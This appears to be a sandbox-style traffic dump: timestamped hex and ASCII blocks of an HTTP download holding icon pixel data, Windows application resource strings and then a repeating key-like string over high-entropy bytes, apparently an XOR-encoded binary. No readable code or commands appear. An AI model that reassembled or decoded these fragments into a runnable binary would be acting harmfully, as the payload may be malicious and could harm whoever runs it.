                                                                            2022-05-23 16:59:08 UTC536INData Raw: 4c 1c df ff 4b 1c dd ff 4a 1c d4 ff 49 1c c3 ff 47 1d b3 ff 47 1d ad ff 47 1d af ff 47 1d b1 ff 47 1d b0 ff 47 1d b0 ff 47 1d b0 fd 47 1d b0 fc 47 1d b0 ff 47 1d b1 fa 47 1d b4 84 49 1c cb 06 41 39 ff 00 3c 3a c3 04 12 a1 fb 03 11 a6 fb 00 11 a3 fc 8e 11 a3 fc ff 11 a3 fc fb 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 13 a4 fc ff 0e a2 fc ff 17 a5 fc ff 62 c2 fe ff 78 ca fe ff 70 c7 fe ff 71 c8 fe ff 79 cb fe ff 44 b7 fd ff 0b a1 fc ff 11 a3 fc ff 11 a3 fc ff 10 a2 fb ff 04 91 e6 ff 03 8f e2 ff 03 8f e3 fd 03 8f e3 ff 04 90 e4 d5 25 c3 ff 02 17 ae ff 00 07 96 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 a3 fc 00 11 a3 fc
                                                                            Data Ascii: LKJIGGGGGGGGGGGIA9<:bxpqyD%
                                                                            2022-05-23 16:59:08 UTC544INData Raw: 04 91 e5 a2 02 8d e0 00 01 8d e0 03 07 96 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 93 e9 00 0b 99 f2 00 0e 9e f8 00 04 90 e4 03 04 8b df 01 1f b8 ff 00 2b c9 ff 02 09 98 ee 35 07 94 e9 7f 05 92 e7 bd 04 91 e6 e4 04 90 e4 f9 04 90 e4 ff 03 90 e4 ff 03 8f e4 ff 03 8f e4 ff 03 8f e4 f3 04 90 e4 d8 04 90 e5 a6 04 91 e6 5f 07 95 eb 17 01 8c e0 00 00 85 d7 00 02 8e e3 03 0c 8c da 02 57 44 38 02 4e 4c 4b 00 4d 4d 4d 33 4d 4d 4d cb 4d 4d 4d ff 4d 4d 4d fb 4d 4d 4d fa 4d 4d 4d ff 4d 4d 4d d6 4d 4d 4d 17 4d 4d 4d 00 4d 4d 4d 02 4d 4d 4d 00 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 02 4d 4d 4d
                                                                            Data Ascii: +5_WD8NLKMMM3MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMKKKMMMMMMMMMMMM
                                                                            2022-05-23 16:59:08 UTC552INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                            Data Ascii:
                                                                            2022-05-23 16:59:08 UTC560INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 00 4d 4d 4d 03 4d 4d 4d 00 4d 4d 4d 21 4d 4d 4d d4 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d fd 4d 4d 4d ff 4d 4d 4d bd 4e 4e 4e 0f 4e 4e 4e 00 4d 4d 4d 01 4e 4e 4e 00 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MMMMMMMMMMMMMMMMMM!MMMMMMMMMMMMMMMMMMMMMMMMNNNNNNMMMNNNMMM
                                                                            2022-05-23 16:59:08 UTC568INData Raw: 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c da fe 4c 1b e1 ff 4b 1c db e6 4b 1c da 37 4b 1c d9 00 4a 1c d0 04 47 1d 9c 00 47 1d 9b 00 48 1d bb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: KKKKKKKKKKKKKKKKKKKKKKKKKKLKK7KJGGH
                                                                            2022-05-23 16:59:08 UTC576INData Raw: 3d 3d 3d ff 3d 3d 3d ff 76 76 76 ff f0 f0 f0 ff eb eb eb ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ea ea ea ff f5 f5 f5 ff d1 d1 d1 ff 56 56 56 ff 47 47 47 ff 51 51 51 ff 4c 4c 4c ff 46 46 47 ff a8 a7 a9 ff d9 db d2 ff 73 53 d7 ff 43 11 dd ff 4d 1f dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c df ff 49 1c cb fe 47 1d ad ff 47 1d b2 f4 48 1d ba 23 48 19 c1 00 48 1a bf 02 4b 4a 4d 01 4d 4d 4d ce 4d 4d 4d ff 4d 4d 4d fb 4d 4d 4d ff 4d 4d 4d 47 4d 4d 4d 00 4d 4d 4d 03 4e 4e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ======vvvVVVGGGQQQLLLFFGsSCMKKKKKKKKKKKKIGGH#HHKJMMMMMMMMMMMMMMMMGMMMMMMNNN
                                                                            2022-05-23 16:59:08 UTC584INData Raw: ef ed ec ff 8d d0 fa ff 6a c6 ff ff 75 c9 fe ff 71 c8 fe ff 6d c7 ff ff be de f3 ff f5 ef eb ff ea eb ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ea ea ea ff f6 f6 f6 ff a7 a7 a7 ff 3c 3c 3c ff 46 46 46 ff 48 48 48 ff cf cf cf ff f2 f2 f2 ff eb eb eb ff e9 e9 e9 ff cd cd cd ff cb cb cc ff ce cf cc ff c4 c1 cd ff 54 28 db ff 49 19 dc ff 4c 1d dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c df ff 49 1d c4 ff 47 1d ad ff 47 1d b1 fb 47 1d b0 ff 47 1d b4 7b 47 1d b3 00 47 1d b3 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: juqm<<<FFFHHHT(ILKKKKKKKKIGGGG{GG
                                                                            2022-05-23 16:59:08 UTC592INData Raw: e8 eb ed ff 81 cc fc ff 6f c7 fe ff 6f c7 fe ff 80 cc fc ff e8 eb ed ff ed ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ea ea ea ff f3 f3 f3 ff c4 c4 c4 ff 49 49 49 ff 4b 4b 4b ff 3b 3b 3b ff 2d 2d 2d ff 38 38 38 ff ae ae ae ff d5 d5 d6 ff c8 c8 c9 ff d2 d4 cc ff 6e 4b d9 ff 44 12 dd ff 4d 1f dc ff 4a 1b dc ff 48 18 db ff 48 18 db ff 4a 1b dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dd ff 4b 1c d8 ff 47 1d b3 ff 47 1d af ff 47 1d b0 ff 47 1d b0 fb 47 1d b0 ff 47 1d b3 99 47 1d ae 00 47 1d ae 03 48 1d b9 00 49 1e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ooIIIKKK;;;---888nKDMJHHJKKKKKGGGGGGGGHI
                                                                            2022-05-23 16:59:08 UTC600INData Raw: 49 19 db ff 5f 32 e5 ff 7b 52 f0 ff 7b 52 f1 ff 7c 53 f1 ff 7d 54 f1 ff 7d 55 f1 ff 7d 55 f1 ff 7c 54 f1 ff 7b 52 f0 ff 79 50 f0 ff 78 4f ef ff 79 50 f0 ff 7b 53 f1 ff 7d 55 f1 ff 7b 52 f0 ff 6e 44 eb ff 5a 2c e2 ff 4a 1b dc ff 48 19 da ff 4b 1c dd ff 4b 1c df ff 4a 1c cf ff 47 1d b4 ff 47 1d ad ff 47 1d b1 ff 47 1d b0 ff 47 1d b0 ff 47 1d b0 fe 47 1d b0 fb 47 1d b0 ff 47 1d b3 9b 2c 37 0f 00 35 49 bf 03 21 7d e8 05 11 a1 f9 00 11 a3 fc 8e 11 a3 fc ff 11 a3 fc fb 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 13 a4 fc ff 0d a2 fc ff 18 a6 fc ff 54 bd fd ff 65 c3 fe ff 37 b2 fd ff 0d a2 fc ff 12 a3 fc ff 11 a3 fc ff 10 a2 fa ff 04 90 e5 ff 03 8f e3 fe 03 8f e3 ff 03 90 e4 ec 07 96 eb 0f 07 95 ea 00 05 92 e7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: I_2{R{R|S}T}U}U|T{RyPxOyP{S}U{RnDZ,JHKKJGGGGGGGGG,75I!}Te7
                                                                            2022-05-23 16:59:08 UTC608INData Raw: 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 11 a3 fc ff 12 a4 fe fe 0d 9d f4 ff 03 8f e3 e5 06 93 e8 4d 02 8f e3 00 03 90 e3 03 01 8a dd 00 05 91 e5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 8e ee 00 03 8f e3 03 03 8e e2 00 03 8f e3 46 03 90 e4 ff 07 95 ea fb 0b 9b f2 fc 0f a0 f8 ff 10 a2 fb ff 11 a4 fd ff 12 a4 fd ff 12 a4 fd ff 12 a4 fd ff 12 a4 fd ff 11 a3 fc ff 10 a2 fa ff 0e 9e f6 ff 0a 99 f0 ff 06 93 e8 ff 03 8e e2 ff 02 8e e2 ff 03 8f e3 ff 03 8f e3 ff 03 8f e3 ff 03 8f e3 fe 03 8f e3 fb 03 8f e3 fe 03 8f e4 ff 05 91 e6 6f 00 8c e2 00 00 8f e6 03 3e 5e 70 01 4f 4d 4c 02 00 05 09 00 4d 4d 4d b8 4d 4d 4d ff 4d 4d 4d fa 4d 4d 4d ff 4d 4d 4d cb 4c 4c 4c 04 4c 4c 4c 00 4d 4d 4d
                                                                            Data Ascii: M!Fo>^pOMLMMMMMMMMMMMMMMMLLLLLLMMM
                                                                            2022-05-23 16:59:08 UTC616INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            2022-05-23 16:59:08 UTC624INData Raw: 20 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 69 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 69 00 6f 00 6e 00 2c 00 20 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 6e 00 75 00 6d 00 62 00 65 00 72 00 20 00 61 00 6e 00 64 00 20 00 63 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 0a 00 41 00 62 00 6f 00 75 00 74 00 34 00 51 00 75 00 69 00 74 00 20 00 74 00 68 00 65 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 3b 00 20 00 70 00 72 00 6f 00 6d 00 70 00 74 00 73 00 20 00 74 00 6f 00 20 00 73 00 61 00 76 00 65 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 73 00 0a 00 45 00 78 00 69 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 41 28 00 53 00 77 00 69
                                                                            Data Ascii: program information, version number and copyrightAbout4Quit the application; prompts to save documentsExitPA(Swi
                                                                            2022-05-23 16:59:08 UTC632INData Raw: 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f 00 32 72 36 33 49 52 36 30 43 50 5e 61 6a 50 30 73 56 30 64 32 59 43 52 72 72 76 77 6d 4f
                                                                            Data Ascii: 0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO2r63IR60CP^ajP0sV0d2YCRrrvwmO
                                                                            2022-05-23 16:59:08 UTC640INData Raw: 56 22 fb cd a6 92 fe 56 c2 76 77 6d ce b4 16 c2 36 33 49 9c a6 5c 5f db da 45 da 50 30 73 dd 74 40 62 b1 42 c1 73 72 3e fe 68 a9 c0 30 72 7a b8 87 13 b5 f8 bc 18 d5 b4 22 db ff fa ca 14 c4 32 59 43 1e ff 2e 52 07 24 c4 5b 22 3b bd 58 51 1b bd 43 63 19 d5 82 35 18 cf 93 9a fc 2c b1 b5 5b 95 36 56 7e e8 24 45 00 01 b2 7a b8 88 db 72 14 4f 97 1a 45 4a 2b 4f f0 56 bb 20 16 79 82 b2 74 fb 32 53 4d ce 44 16 52 45 19 49 52 b7 44 67 70 f3 1a 70 71 b1 07 72 10 79 9e a4 42 d9 36 56 56 fe 29 6b 20 f5 36 12 03 91 43 04 19 84 54 7a 89 bf ba 27 b4 12 14 4c 6c 32 06 6c b5 36 52 4f 84 9a 7a 3a b5 72 17 69 51 f3 87 43 3b 1a 45 4a 4a b9 37 72 10 e5 76 7d 63 73 e2 8d 89 1c 29 6b 20 28 fb 72 17 69 d3 42 14 63 95 5f 5e 8f db 74 57 76 b9 20 16 79 c8 1e 56 5a fd 33 49 7f 33 fa
                                                                            Data Ascii: V"Vvwm63I\_EP0st@bBsr>h0rz"2YC.R$[";XQCc5,[6V~$EzrOEJ+OV yt2SMDREIRDgppqryB6VV)k 6CTz'Ll2l6ROz:riQC;EJJ7rv}cs)k (riBc_^tWv yVZ3I3
                                                                            2022-05-23 16:59:08 UTC648INData Raw: 3f 61 bb 34 14 2f 3d 74 40 6e 15 ca 16 56 2e f7 03 49 13 78 d5 6a 0c f4 cc aa 36 30 43 b7 fb a2 6a d1 b5 8b 56 30 64 9c 6f bc ad f3 f7 8e 77 6d 4f 1a d5 72 36 b2 c4 aa 36 30 43 50 04 95 dc d1 85 8b 56 30 64 8d 82 b4 e4 b5 f7 86 77 6d 4f a7 75 21 36 f2 ec a2 36 30 43 55 df ec 9a 50 30 73 0e 31 98 fd 98 e6 a2 72 72 76 7e ec fa f0 32 72 36 18 13 bb cf f7 07 74 06 40 f5 f3 30 f2 12 14 3c 22 70 bc ad b3 1e 52 2f 6b ce 74 16 2a 22 d9 47 52 f1 74 67 00 94 7c 34 50 bb 37 72 60 e9 3e 99 fb 93 b2 b2 b6 74 a4 c6 4c 16 22 b7 7f 6d 02 66 95 c9 09 df 15 4e 00 15 69 c9 6f a3 76 7d 17 ad fc 90 76 fc 21 6b 54 c5 93 8e 2c cc b9 67 f1 a9 56 d7 35 4e 04 bb 3f 72 64 93 d3 98 a9 57 fb 26 52 23 ec 3b 24 66 ee 0c 3b 49 d9 72 14 17 db 1a 45 3a db 74 57 0e bb e1 c2 59 43 52 36 f9
                                                                            Data Ascii: ?a4/=t@nV.Ixj60CjV0dowmOr660CPV0dwmOu!660CUP0s1rrv~2r6t@0<"pR/kt*"GRtg|4P7r`>tL"mfNiov}v!kT,gV5N?rdW&R#;$f;IrE:tWYCR6
                                                                            2022-05-23 16:59:08 UTC656INData Raw: 8a e5 8a f2 23 b0 80 5e a2 f9 95 37 e6 04 41 35 4f 81 47 e6 b5 35 95 ab b7 45 d7 3b 8e e8 93 97 75 eb 06 6a c1 32 98 26 ca 7f f3 03 ef fe b0 4d 99 b5 73 b7 20 c0 31 30 c2 25 da 93 39 6b 7d 18 13 b4 0a bb 1c c7 d3 07 f6 21 c7 7b 7f c7 77 1a cd 7d dd 52 f7 5d 2b 59 9f 0c 02 5f b1 06 3e a5 70 39 59 84 17 12 4a 0e 04 6d ce 4d 52 8d 49 cc b2 d3 43 50 4e 3c ad 9a 22 db 35 a6 d6 32 64 7a da 83 22 3a fb f2 53 ed 4f 00 32 f9 73 53 c0 16 12 48 0b dd 1b b9 22 d9 74 57 26 bb 21 5a d0 07 76 1a f9 33 f3 e4 0b 24 52 3a bd 36 ed d2 34 30 0b db 16 69 e1 15 a8 3b df 7c 40 6a 11 ca 0e 56 22 ff 33 49 07 8b 77 e6 bf 77 6d 12 7e bb 46 d1 de 63 6a db 78 63 dd 75 ec bb 15 67 62 fb 36 52 5f e6 0a 80 76 f9 7b 6b c2 07 a6 bb 0e dc 12 ea 2f f0 b9 37 72 10 8c 3b 04 43 52 b5 37 2e e1
                                                                            Data Ascii: #^7A5OG5E;uj2&Ms 10%9k}!{w}R]+Y_>p9YJmMRICPN<"52dz":SO2sSH"tW&!Zv3$R:640i;|@jV"3Iwwm~Fcjxcugb6R_v{k/7r;CR7.
                                                                            2022-05-23 16:59:08 UTC664INData Raw: f4 73 56 78 ef 37 93 22 50 72 b5 32 53 1d 89 f1 33 72 f1 77 6d 26 ed 74 47 50 99 25 4e 28 19 8d 59 30 2c b7 99 4c d7 ff 72 76 77 aa cb 24 82 72 36 33 de 3b 48 30 02 e9 64 e5 1c c2 71 cb 79 47 82 0d 32 c7 76 c2 72 76 77 5e c6 84 16 c2 36 33 49 d3 b2 14 f3 50 5e 61 a6 c7 30 73 d7 b4 40 82 59 43 52 3f 00 89 88 ec fb 24 82 72 36 33 9f 38 13 29 84 d4 7a b9 6a 50 30 c0 ae 16 64 b3 ed 67 8a 72 72 76 8e 33 75 e4 b3 f6 12 eb 49 52 36 b9 d9 50 5e e0 de 74 e8 73 56 30 a1 23 4b a7 d9 f6 56 ae 77 6d 4f 8b b6 56 86 33 49 52 de 4f 71 51 5e 29 e3 55 2c 12 54 30 2c b1 3d 67 6a 72 fb 02 53 5d 07 83 56 56 1e 33 01 d1 52 14 63 50 1b 52 a3 1c bb b4 1e bb b7 7a d2 8e ad a2 3e fb eb 49 cf 00 32 72 7f b8 12 42 7f bb 28 48 17 ea 19 70 79 f8 b5 6f a7 fe 95 8f 1a fb 2e 52 7f 3a 07
                                                                            Data Ascii: sVx7"Pr2S3rwm&tGP%N(Y0,Lrvw$r63;H0dqyG2vrvw^63IP^a0s@YCR?$r638)zjP0dgrrv3uIR6P^tsV0#KVwmOV3IROqQ^)U,T0,=gjrS]VV3RcPRz>I2rB(Hpyo.R:
                                                                            2022-05-23 16:59:08 UTC672INData Raw: 39 a7 8c 68 d1 c8 1f 1d 85 97 5c a7 9e e9 31 b8 7e b8 9a 93 df 36 ca 1d 31 0a 2f 3f 12 fa 13 5f e5 47 36 2b ea 12 5b b1 32 12 c6 cc 33 72 5d 76 36 1c bf 75 3c d1 2b 1e 2a 43 bf 73 dd 75 1b bb 1d 67 62 f9 37 e1 33 e6 02 6f b9 3f 41 7b c0 2e 12 18 ca 14 7a 41 82 d9 a1 73 56 f7 21 5d eb 52 2d 72 cc cd c4 6e 4f 81 77 1d 20 df b6 ad b7 45 2c 98 a3 1f 6a db 7d 1c 91 75 1b d8 c7 e8 52 49 b3 ce 08 f5 44 00 3d 36 c6 58 0c 2d 45 b9 06 2f df 14 15 ec bb 62 1b f7 21 45 54 8a 28 72 f3 33 00 c3 1c 00 32 f3 43 44 d8 dc 42 30 84 15 31 cc 83 d0 30 b2 3b 5f 61 59 1c 2c 63 fb 37 19 b6 00 20 09 b3 07 59 87 9a 5c 36 74 c8 1d 31 25 e1 15 47 f8 1b 4f 2c b9 8a ab a6 25 73 76 b0 28 38 5e 12 12 36 7b c2 85 b7 75 34 ff 18 9e 95 d1 7d 04 d8 36 55 c8 d8 36 25 65 95 0a 8d aa 0a 6f ea
                                                                            Data Ascii: 9h\1~61/?_G6+[23r]v6u<+*Csugb73o?A{.zAsV!]R-rnOw E,j}uRID=6X-E/b!ET(r32CDB010;_aY,c7 Y\6t1%GO,%sv(8^6{u4}6U6%eo
                                                                            2022-05-23 16:59:08 UTC680INData Raw: e1 f2 2c 16 95 36 56 1e f5 82 ec 00 73 cb 12 53 60 7e 77 88 76 ef 7a 73 eb 24 14 1b aa 34 38 8f d8 37 76 1a 34 72 8e d0 88 44 16 2a 37 d6 b0 52 b7 74 67 08 43 ea 6a 50 f1 1f 72 68 74 b3 2d 67 0a 80 61 7f 77 e6 0b 24 6a f9 72 17 21 ba e8 c2 43 50 16 e8 6f bb 11 71 56 74 ef f1 6a 91 61 bb 3a f5 b3 5d 14 48 cd 92 7e b0 a5 7a f1 74 67 58 7e 9d 6c 50 f7 37 72 3c 61 c7 53 43 61 b2 fb 32 53 7d 88 44 16 42 fd f7 a3 52 7a bb 82 91 3a 45 5a 5b b1 07 72 00 10 a9 7e 15 d9 36 56 46 fe 29 6b 30 f5 36 12 73 0b a7 29 53 84 54 7a cc e4 d7 68 b4 12 14 5c 4e 07 ee a2 b5 36 52 3f c1 c1 17 75 b5 72 17 79 3d f6 b0 43 d1 1a 45 5a 33 8e 8c a9 b1 10 16 69 e5 ef f3 72 fd 33 49 7f 89 76 56 06 b8 05 76 0e bb 07 74 1e 52 a2 11 b9 7b 91 74 40 02 85 7b 0b 72 b3 1a 53 5d 4d 81 7e 56 06
                                                                            Data Ascii: ,6VsS`~wvzs$487v4rD*7RtgCjPrht-gaw$jr!CPoqVtja:]H~ztgX~lP7r<aSCa2S}DBRz:EZ[r~6VF)k06s)STzh\N6R?ury=CEZ3ir3IvVvtR{t@{rS]M~V
                                                                            2022-05-23 16:59:08 UTC688INData Raw: 1d ca 1e 56 52 25 3f ee a3 40 b9 36 12 43 08 eb 32 31 43 50 16 ea b3 d9 74 57 76 d8 84 56 59 43 1a f9 77 33 75 6f 4f c7 76 56 06 f8 45 51 36 f7 07 74 6a 18 18 54 30 3b d3 f0 11 57 9e 07 76 1a c7 d3 47 6d ce 44 16 1a 8c 29 49 52 b7 74 67 38 ea 89 6a 50 f1 1f 72 58 62 b3 2d 67 3a 5c 87 7a 77 aa 0b 24 02 82 f4 aa 49 d3 72 14 73 5f 66 61 6a 11 89 bb 3e e2 70 73 e1 18 93 08 dd f7 33 49 7f 1b 70 8d c9 b2 3d 76 06 99 df c6 5e ea 2e 74 00 f8 12 14 0c da cf 91 52 72 3a ff 72 a6 4e 02 32 3a bd e0 f0 56 37 30 43 18 dd a5 2a 0b 78 8c b6 fc a8 fe 19 10 1a f1 9e 36 3e e6 96 e8 0c 16 36 33 7a 92 7e b9 07 74 6e 29 e1 55 94 72 54 30 a3 76 7d 6b dd 94 7b 76 b0 29 6b 2c 56 d6 38 33 01 d7 f6 45 27 97 1a 45 4a 1c 30 19 56 71 dd 50 c8 62 93 33 ca 2d b6 17 e0 c1 5e 56 16 3f c8
                                                                            Data Ascii: VR%?@6C21CPtWvVYCw3uoOvVEQ6tjT0;WvGmD)IRtg8jPrXb-g:\zw$Irs_faj>ps3Ip=v^.tRr:rN2:V70C*x6>63z~tn)UrT0v}k{v)k,V83E'EJ0VqPb3-^V?
                                                                            2022-05-23 16:59:08 UTC696INData Raw: d1 b6 22 29 3f 92 af cc 7a f1 da 1b 8e 16 12 38 91 90 5e 61 59 90 7c f8 9f 78 ed 76 7d 4f 95 36 56 46 75 2c 5a 00 7e f9 e4 77 c2 16 12 00 fb 4f 2c 38 5b 11 c7 93 97 da 60 bb 0d 67 62 f3 3e 52 47 bb fe f1 f8 f3 42 17 79 de 10 ca 89 db 1a 45 5a d9 74 57 66 f7 20 16 19 00 bb e4 5d b1 73 49 2b b5 ab 69 f1 77 6d 6a 68 4b 5e 4c 99 25 4e 18 54 c6 fa 5e a3 76 7d 73 31 65 47 76 f6 29 6b 30 7b 3f c9 cc c8 26 12 00 bc e3 61 61 e1 14 14 43 df 74 40 02 d2 0f 76 4a f9 32 53 2d 7c c8 8a d7 77 29 ed 13 bf 39 84 14 7a 51 f6 cd 9d 73 d7 74 40 02 e8 0b ad 8d f9 3a 53 5d b8 e1 19 b8 e7 da 4a 98 f7 d9 46 d9 12 45 5a d1 44 57 66 8d dd 3d 59 c8 16 56 42 ff 33 49 7f 8b 7e 56 7e b8 4d 76 05 f8 02 d9 54 a6 2e 74 00 d2 6e a6 64 f3 3d 67 62 7d f3 32 53 5d 46 35 cd 8d b7 77 6d 62 69
                                                                            Data Ascii: ")?z8^aY|xv}O6VFu,Z~wO,8[`gb>RGByEZtWf ]sI+iwmjhK^L%NT^v}s1eGv)k0{?&aaCt@vJ2S-|w)9zQst@:S]JFEZDWf=YVB3I~V~MvT.tnd=gb}2S]F5wmbi
